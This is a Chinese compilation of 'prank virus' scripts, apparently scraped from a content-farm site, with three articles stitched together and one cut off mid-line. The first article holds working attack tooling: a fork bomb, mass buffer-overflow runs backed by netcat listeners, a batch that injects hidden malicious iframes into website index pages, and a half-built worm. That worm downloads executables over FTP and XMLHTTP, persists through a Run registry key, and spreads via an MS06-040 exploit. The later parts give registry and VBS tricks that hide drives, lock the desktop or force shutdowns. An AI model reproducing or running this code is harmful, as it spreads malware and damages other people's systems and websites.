篇一:一些bat恶搞代码
第一个:让别人内存OVER(逼他重启)
@echo off
start cmd
%0
就这3行了
第二个:让对方重启指定次数(害人专用)
@echo off
if not exist c:\1.txt echo. >c:\1.txt & goto err1
if not exist c:\2.txt echo. >c:\2.txt & goto err1
if not exist c:\3.txt echo. >c:\3.txt & goto err1
if not exist c:\4.txt echo. >c:\4.txt & goto err1
if not exist c:\5.txt echo. >c:\5.txt & goto err1
goto err2
:err1
shutdown -s -t 0
:err2
上面可以让对方电脑重启5次后不在重启
第三个:自动踢人(3389肉机保护自己专用)
@echo off
logoff 1
del log.bat
logoff后面的1改成自己登陆的ID号,用query user查看
第四个: 批量自动溢出
@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521
先自己用NC监听端口,多开几个,然后指行,就自动溢出了
第五个:自动挂马改主页
@echo off
cls
rem 直接打批处理名字就有帮助
title 批量挂马,改首页(伤脑筋 QQ:447228437).
color A
set pan=%1
set ye=%2
set dai=%3
if "%pan%"=="" goto e1
if "%ye%"=="" goto e1
if "%dai%"=="" goto e1
if "%dai%"=="htm.txt" goto u1
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^<iframe src="http://%dai%" width="0" height="0" frameborder="0"^> >>@path" echo.
echo代码全部插入完毕!!!!
echo.
pause
goto e1
:u1
echo 您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容. echo 这将是非常危险的,您真的要这样做? 回车却认,Ctrl+c取消操作. pause
forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y"
echo.
echo 首页全部更改完必!!!!如果您发现没有替换成功,请将%ye%文件只读属性去掉.
echo.
pause
:e1
echo.
echo 本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下
echo 用法:snj ^<搜索盘符^> ^<文件名^> ^<网马地址^>
echo 例子:snj d:\ index.asp /mm.htm
echo 批处理将自动添加^<iframe^>标记
echo.
echo 如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件.
echo 然后将要更改的代码加COPY到里面保存.然后将命令的^<网马地址^>项输入为htm.txt即可.
echo 例子:snj d:\ index.asp htm.txt
echo.
echo 为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让
命令保持在一行才能正确执行.
echo.
echo 使用此批处理造成一切后果本人概不负责,请大家谨慎使用!
echo.
第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒
本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.
这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完 del c:\42.exe
del c:\nc.exe
del c:\ip.exe
echo dim wsh > %systemroot%\help\test.vbs
echo set
wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810
< %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs
echo dim wsh > %systemroot%\help\test2.vbs
echo set
wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test2.vbs echo wsh.run "cmd /c
start %systemroot%\help\good.bat",0 >> %systemroot%\help\test2.vbs echo open 10.0.0.5 > %systemroot%\help\ftp.txt
echo open myyes >> %systemroot%\help\ftp.txt
echo 1 >> %systemroot%\help\ftp.txt
echo binary >> %systemroot%\help\ftp.txt
echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt
echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt
echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt
echo bye >> %systemroot%\help\ftp.txt
echo echo Set xPost = CreateObject("Microsoft.XMLHTTP")
^>1.vbs > %systemroot%\help\or.txt
echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo...,0
^>^>1.vbs >> %systemroot%\help\or.txt
echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo Set sGet = CreateObject("ADODB.Stream")
^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.Write(xPost.responseBody)
^>^>1.vbs >> %systemroot%\help\or.txt
echo echo sGet.SaveToFile "d:\my.exe",2
^>^>1.vbs >> %systemroot%\help\or.txt
echo echo 1.vbs ^>^>1.vbs >> %systemroot%\help\or.txt
echo echo my.exe ^>^>1.vbs >> %systemroot%\help\or.txt
echo Windows Registry Editor Version 5.00 > %systemroot%\help\1.reg echo
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %systemroot%\help\1.reg
echo "SKYNET Personal FireWall"="F:\\系统安全工具
\\FireWall\\PFW.exe" >> %systemroot%\help\1.reg
echo "1"="%systemroot%\\help\\test2.vbs" >> %systemroot%\help\1.reg
if not exist %systemroot%\help\good.bat copy
good.bat %systemroot%\help\good.bat & %systemroot%\help\test2.vbs & del good.bat
regedit -s %systemroot%\help\1.reg
ftp -s:%systemroot%\help\ftp.txt
move c:\nc.exe %systemroot%\help\ /y
move c:\42.exe %systemroot%\help\ /y
move c:\ip.exe %systemroot%\help\ /y
%systemroot%\help\test.vbs
rem for /f %%i in (result1.txt) do set a=%%i
rem for /f %%j in (result.txt) do 42 %a% %%j 810
准备:
1:找一个反向连接的溢出攻击程序,如ms06040漏洞
2:找呀一个免费FTP空间,最好是送域名的
3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具.
思路:
用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功, 如果成功开启一个NC监听端口,NC后面带一个 < 输入符号
输入的内容为下载本批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的.
把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下
因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下
echo dim wsh > %systemroot%\help\test.vbs
echo set
wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810
< %systemroot%\help\or.txt",0 >> %systemroot%\help\test.vbs
生成随机IP工具的VB代码
Private Sub Form_Load()
Dim fso As New FileSystemObject
Dim a, b, c, d As Integer
Dim ph, e As String
ph = App.Path & "\" & "ip.txt"
Randomize
a = Int(253 * Rnd + 1)
b = Int(253 * Rnd + 1)
c = Int(240 * Rnd + 1)
Open ph For Output As #1
For i = c To c + 7
For j = 1 To 254
e = a & "." & b & "." & i & "." & j Print #1, e
DoEvents
Next j
Next i
Close #1
Unload Me
End Sub
篇二:整人“病毒”代码(一)
发表于 2013-10-23 10:33
前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。
PS:由于精力问题没有对代码的可用性进行一一验证,所以不保证全部可用,大家如果发现有不可用的或者需要改进的地方请提出来,以下代码仅供娱乐,请勿用于非法用途。
一、怎么点都没反应的桌面
如果同事的电脑开着,他离开电脑前一会,嘿嘿,机会来了。
把他的电脑桌面按print键截屏截下来,(当然QQ截屏也可以,不过效果不太逼真!)建议大家用print截屏,设置为桌面。
然后把原来在桌面上的文件统统移到一个盘的文件夹里,这样桌面看上去和平时一个样。他回来后狂点鼠标,却怎么都没有反应!现在还在关机,开机,关机,开机,关机,开机中????
附带:print键截屏方法:
键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图!
用法一,按“Print Screen SysRq”一下,对当前屏幕进行抓图,就是整个显示屏的内容。
用法二,先按住“Alt”键,再按 “Print Screen SysRq”键,则是对当前窗口进行抓图。如你打开“我的电脑”后,用此法就抓取“我的电脑”窗口的内容。
用上诉两种方法抓图后,再打开“开始”、“附件”里的“画图”程序,点“编辑”、“粘贴”就把抓取的图片贴出来了,可以保存为自己需要的格式。哈哈,简单吧,这方法真挺搞的,有兴趣的童鞋可以试试!
二、让电脑硬盘消失-隐藏磁盘方法
愚人节电脑整人使无端端地电脑磁盘的某个分区消失了,钻进地缝里面去了吗,给外星人抓走了??非也!是某些人使坏将其隐藏起来了!
步骤
1.新建一个记事本
2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“新建文件.reg”
3.将下面的代码复制到记事本当中:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives" =hex:08,00,00,00
解释
(1)"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的
图中的D盘已经神秘消失了。
(2)A=01000000 B=02000000 C=04000000 D=08000000 E=10000000 F=20000000G=40000000 H=80000000 I=00010000 J=00020000 K=00040000 原理介绍:二进制值 “NoDrives”的缺省值均是00,00,00,00,表示不隐藏任何驱动器。键值由四个字节组成,每个字节的每一位(bit)对应从A:到Z:的一个盘,当相应位为1时,“我的电脑”中相应的驱动器就被隐藏了。第一个字节代表从A到H的8个盘,即01为A,02为B,04为C??依次类推,第二个字节代表I到P,第三个字节代表Q到X,第四个字节代表Y和Z。比如要关闭C盘,将键值改为04,00,00,00;要关闭D盘,则改为 08,00,00,00,若要关闭C盘和D盘,则改为0C,00,00,00(C是十六进制,转成十进制就是12)。
理解了原理后,下面以笔者的电脑为例说明如何操作:笔者的电脑有一个软驱、一个硬盘(5个分区)、一个光驱,盘符分布是这样的:A:(3.5软盘)、 C:、D:、E:、F:、G:、H:(光盘),所以我的“NoDrives”值为“02ffffff”,隐藏了B、I到Z盘。
还原方法
1.点击开始--运行,如图,在运行对话框中输入“regedit”,打开注册表编辑器。
2.依次打开
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer],将右侧窗口中"NoDrives"这个子键删除。
3.重新启动电脑。
三、空空的桌面
电脑桌面是用户最熟悉不过的了,电脑整人方法电脑启动之后首先呈现的就是桌面了,如果在愚人节你把你朋友的桌面给Hack掉了话,你的朋友是不是会发疯啊?
桌面是用户操作电脑首先进入的界面,电脑桌面空空如也,一望无垠的时候,你是否很无奈?原来这一切都是它在作怪!
如图整人后桌面清清爽爽,什么都没有!
方法步骤
1. 新建一个记事本
2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“桌面.reg”
3.将下面的代码复制到记事本当中:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
\Explorer]
"NoDesktop"=dword:00000001
"NoSetTaskbar"=dword:00000001
解释:(1)"NoDesktop"=dword:00000001 这个键值是屏蔽桌面的;
(2)"NoSetTaskbar"=dword:00000001这个键值是禁用“任务栏属性”功能。 将信息导入到注册表之后,桌面图标、桌面右键、桌面属性的功能都被禁用了。 还原方法:
1.点击开始--运行,如图,在运行对话框中输入“regedit”,打开注册表编辑器。
2依次打开
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer],将右侧窗口中“NoDesktop”、“NoSetTaskbar”这两个子键删除。
四、让天使替我说我爱你
CreateObject("SAPI.SpVoice").Speak"i love you"
送给你女朋友她会高兴地,保存为.vbs格式
五、打开无数个计算器
set wsh=createobject("wscript.shell")
do
wsh.run "calc"
loop
这段代码是打开无数个计算器,直到死机 ,也是保存为.vbs格式
六、你被耍了
while(1)
msgbox "哈哈 你被耍了!"
loop
这段代码就比较坏了,一直弹出窗口显示"哈哈,你被刷了!"要是你不会结束它,只好重启电脑了,也是保存为.vbs格式
七、甩不掉的魔鬼
WScript.Echo("嘿,谢谢你打开我哦,我等你很久拉!"&TSName)
WScript.Echo("你是可爱的小朋吗?")
WScript.Echo("哈,我想你拉,这你都不知道吗?")
WScript.Echo("怎么才来,说~是不是不关心我")
WScript.Echo("哼,我生气拉,等你这么久,心都凉啦。")
WScript.Echo("小强很生气,后果很严重哦。")
WScript.Echo("嘿嘿!你也会很惨滴哦")
WScript.Echo("是不是想清除我?")
WScript.Echo("那你要点上50下哦,不过会给你惊喜滴")
WScript.Echo("还剩49下,快点点哦")
WScript.Echo("还剩48下,快点,小笨蛋!")
WScript.Echo("还剩47下对,就这样快点点!")
WScript.Echo("还剩46下。你啊就是笨,要快哦,我先不打扰你工作。") WScript.Echo("还剩45下,记得要快哦!")
WScript.Echo("还剩43下")
WScript.Echo("还剩42下")
WScript.Echo("还剩41下")
WScript.Echo("还剩40下")
WScript.Echo("还剩39下")
WScript.Echo("还剩38下")
WScript.Echo("还剩37下")
WScript.Echo("还剩36下")
WScript.Echo("还剩35下")
WScript.Echo("还剩34下")
WScript.Echo("还剩33下")
WScript.Echo("还剩32下")
WScript.Echo("还剩30下")
WScript.Echo("还剩29下")
WScript.Echo("还剩28下")
WScript.Echo("还剩27下")
WScript.Echo("还剩26下")
WScript.Echo("还剩25下")
WScript.Echo("还剩24下")
WScript.Echo("还剩23下")
WScript.Echo("还剩22下")
WScript.Echo("还剩21下")
WScript.Echo("还剩20下")
WScript.Echo("还剩19下")
WScript.Echo("还剩18下")
WScript.Echo("还剩17下")
WScript.Echo("还剩16下")
WScript.Echo("还剩15下")
WScript.Echo("还剩14下")
WScript.Echo("还剩13下停停!!!慢点,我有话要说")
WScript.Echo("还剩12下,你继续点我就会消失滴")
WScript.Echo("还剩11下,以后就看不到我拉。555555")
WScript.Echo("还剩10下,你现在可以选择停止!")
WScript.Echo("还剩9下。你还点啊,不要我拉?")
WScript.Echo("还剩8下,有点伤心拉,干嘛丢弃人家")
WScript.Echo("还剩7下。疯了,你有点负意!")
WScript.Echo("还剩6下。对。你就点吧,我恨你!")
WScript.Echo("还剩5下,不明白,删除我你就好吗?")
WScript.Echo("还剩4下!真要删除我?")
WScript.Echo("还剩3下。可是我真的很眷恋你。。。")
WScript.Echo("还剩2下。不要这么绝情嘛,人家是爱你的!")
WScript.Echo("还剩1下。哼,既然你这么绝情。也别怪我无义!!!")
WScript.Echo("我本因该消失的,不过我留恋你滴芳容,上帝又给了一次机会。")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
WScript.Echo("想结素我么?那你就再多点一次")
改成.vbs
八、说我是猪
on error resume next
dim WSHshellA
set WSHshellA =wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r-t 180 -c ""说我是猪,不说我是猪就一分钟关机,不信,试下···"" ",0 ,true
dim a
do while(a <> "我是猪")
a = inputbox ("说我是猪,就不关机,快撒,说""我是猪""
","说不说","",8000,7000)
msgboxchr(13) + chr(13) + chr(13) +a,0,"MsgBox"
loop
msgboxchr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell =wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown-a",0 ,true
msgboxchr(13) + chr(13) + chr(13) + "哈哈哈哈,好乖"
这个运行后必须输入我是猪(当然你也可以改成别的,把代码中所有的我是猪换成你想改的,
比如说我爱XXX之类的,大家懂的 ),如果一分钟没输入我是猪,就会关机.也改成.vbs
九、被鬼附身的记事本
dim sh,str,a,i
setsh=createobject("wscript.shell")
sh.run "notepad" '打开记事本
do while sh.appactivate("无标题 - 记事本")=false
wscript.sleep 1000
loop
str="wokao1!ni1youmeiyou1gaocuo1!"'这一行是演示中文输入。定义要打字的字符串。只能是英文或数字或符号。
'如果想输入中文请把下2行的注释去掉。否则就在前面加上注释符号“'”(不
篇三:整人病毒代码
前段时间看到大家对这种整人的代码兴趣还挺浓厚的,我最近就收集了一些和大家分享。 PS:由于精力问题没有对代码的可用性进行一一验证,所以不保证全部可用,大家如果发现有不可用的或者需要改进的地方请提出来,以下代码仅供娱乐,请勿用于非法用途。 一、怎么点都没反应的桌面
如果同事的电脑开着,他离开电脑前一会,嘿嘿,机会来了。
把他的电脑桌面按print键截屏截下来,(当然QQ截屏也可以,不过效果不太逼真!)建议大家用print截屏,设置为桌面。
然后把原来在桌面上的文件统统移到一个盘的文件夹里,这样桌面看上去和平时一个样。他回来后狂点鼠标,却怎么都没有反应!现在还在关机,开机,关机,开机,关机,开机中????
附带:print键截屏方法:
键盘右上方的“Print Screen Sys Rq”键的作用是屏幕抓图!
用法一,按“Print Screen SysRq”一下,对当前屏幕进行抓图,就是整个显示屏的内容。
用法二,先按住“Alt”键,再按 “Print Screen SysRq”键,则是对当前窗口进行抓图。如你打开“我的电脑”后,用此法就抓取“我的电脑”窗口的内容。
用上诉两种方法抓图后,再打开“开始”、“附件”里的“画图”程序,点“编辑”、“粘贴”就把抓取的图片贴出来了,可以保存为自己需要的格式。
哈哈,简单吧,这方法真挺搞的,有兴趣的童鞋可以试试!
二、让电脑硬盘消失-隐藏磁盘方法
愚人节电脑整人使无端端地电脑磁盘的某个分区消失了,钻进地缝里面去了吗,给外星人抓走了??非也!是某些人使坏将其隐藏起来了!
步骤
1.新建一个记事本
2.将记事本的后缀改为.reg,就是将“新建文件.txt”改为“新建文件.reg”
3.将下面的代码复制到记事本当中:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDrives" =hex:08,00,00,00
解释
(1)"NoDrives" =hex:08,00,00,00 这个键值是隐藏D盘的
图中的D盘已经神秘消失了。
(2)A=01000000 B=02000000 C=04000000 D=08000000 E=10000000
F=20000000G=40000000 H=80000000 I=00010000 J=00020000 K=00040000
原理介绍:二进制值 “NoDrives”的缺省值均是00,00,00,00,表示不隐藏任何驱动器。键值由四个字节组成,每个字节的每一位(bit)对应从A:到Z:的一个盘,当相应位为1时,
“我的电脑”中相应的驱动器就被隐藏了。第一个字节代表从A到H的8个盘,即01为A,02为B,04为C??依次类推,第二个字节代表I到P,第三个字节代表Q到X,第四个字节代表Y和Z。比如要关闭C盘,将键值改为04,00,00,00;要关闭D盘,则改为 08,00,00,00,若要关闭C盘和D盘,则改为0C,00,00,00(C是十六进制,转成十进制就是12)。
理解了原理后,下面以笔者的电脑为例说明如何操作:笔者的电脑有一个软驱、一个硬盘(5个分区)、一个光驱,盘符分布是这样的:A:(3.5软盘)、 C:、D:、E:、F:、G:、H:(光盘),所以我的“NoDrives”值为“02 ff ff ff”,隐藏了B、I到Z盘。
还原方法
1.点击开始--运行,如图,在运行对话框中输入“regedit”,打开注册表编辑器。 2.依次打开
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer],将右侧窗口中"NoDrives"这个子键删除。
3.重新启动电脑。
三、空空的桌面
电脑桌面是用户最熟悉不过的了,电脑整人方法电脑启动之后首先呈现的就是桌面了,如果在愚人节你把你朋友的桌面给Hack掉了话,你的朋友是不是会发疯啊?
桌面是用户操作电脑首先进入的界面,电脑桌面空空如也,一望无垠的时候,你是否很无奈?原来这一切都是它在作怪!
<《bat整人电脑病毒代码是怎样的》出自:百味书屋
链接地址:http://www.850500.com/news/32932.html
转载请保留,谢谢!